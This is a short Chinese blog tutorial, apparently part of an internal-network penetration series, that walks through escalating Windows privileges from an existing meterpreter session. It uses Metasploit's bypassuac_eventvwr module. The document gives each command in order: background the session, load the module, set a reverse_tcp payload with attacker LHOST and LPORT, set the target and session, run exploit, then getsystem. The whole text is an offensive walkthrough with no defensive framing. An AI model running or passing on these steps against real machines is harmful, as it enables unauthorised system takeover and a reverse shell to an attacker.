msf_bypassuac提权

反弹msf之前也发了好几篇了,这里小伙子就直接利用已经反弹回来的meterpreter进行uac提权了


一.现在利用meterpreter的getuid进行查看权限,getuid.


这就是一个普通的用户

二.直接利用msf的getsystem尝试提权,getsystem


显示提权失败

三.把这个sessions后台运行,background


四.使用bypassuac模块,use exploit/windows/local/bypassuac_eventvwr


五.对参数进行设置

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.43.79(本机ip)

set LPORT 8888(本机接受的端口)

set target 1 (设置1为x64的,0为x86的,可以show targets进行查看)

set SESSION 1(指向我们刚刚后台运行的那个session)


show options  查看设置是否有错


运行生成一个新的session,exploit


进入新的session后,getsystem


getuid查看下权限


提权成功


感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!

你可能感兴趣的:(内网渗透之路)